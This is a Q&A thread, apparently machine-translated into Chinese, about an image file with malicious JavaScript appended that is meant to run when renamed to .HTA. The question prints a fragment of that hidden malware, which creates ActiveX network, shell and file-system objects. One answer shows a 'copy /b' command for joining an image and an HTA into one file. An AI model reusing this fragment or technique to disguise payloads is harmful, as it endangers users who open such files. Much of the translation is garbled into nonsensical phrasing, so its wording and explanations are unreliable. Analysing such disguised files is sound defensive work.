嵌入的JavaScript内的图像文件

Question

我已经注意到在分配可能不安全的代码的新趋势，人们将图像上传到服务器带有水印建议他们更改文件名有一个.HTA文件扩展名。

我意识到，.HTA是一个HTML应用程序文件，该文件是隐微软的逻辑信任和可以包含代码做任何事情以网络为基础。我打开文件，我最喜欢的文本编辑器让我惊讶有图像文件内的Javascript代码！

jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV

//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");

有更乱码的源代码下面的图像数据，以及。这仅仅是一个片段。

我很好奇，想知道他们如何能够Javascript代码添加到图像文件，而不会破坏图像文件格式，使之无法观看。我提出这个我的一些同事，他们都同样难住了。

Answer 1

我的猜测是，这是某种形式的多文件（这将是完美的罚款包含两个图像和文字数据），也许被执行直线距离（在本地范围内），因为它是作为一个超文本处理应用

有关更多信息，我们需要看到完整的实际文件。

Answer 2

这里的问题是自由的文件格式公差。

在JPG解释器宽容足以忽略“损坏”的非图像数据。这就是你如何查看大量JPG，而它仍然下载。该HTA解释是至赦的，足以忽略所有的怪异的“文本”的文件的顶部，并继续评估的东西，看起来像标记和脚本如下。

有一个关于这个在这里好奇的行为另一篇文章： 我可以嵌入一个图标到名.hta文件？ 在它亚历山大茉莉表明在该命令行的HTA嵌入的图标：

      copy /b icon.ico+source.hta iconapp.hta

您发现该图像/脚本可能已经使用这种技术创建的。

您没有包括整个脚本，但你看长相非常可怕的东西。与网络连接，外壳和文件系统对象的脚本HTA可以做任何它与你的本地文件系统，然后打电话回家想一旦它完成。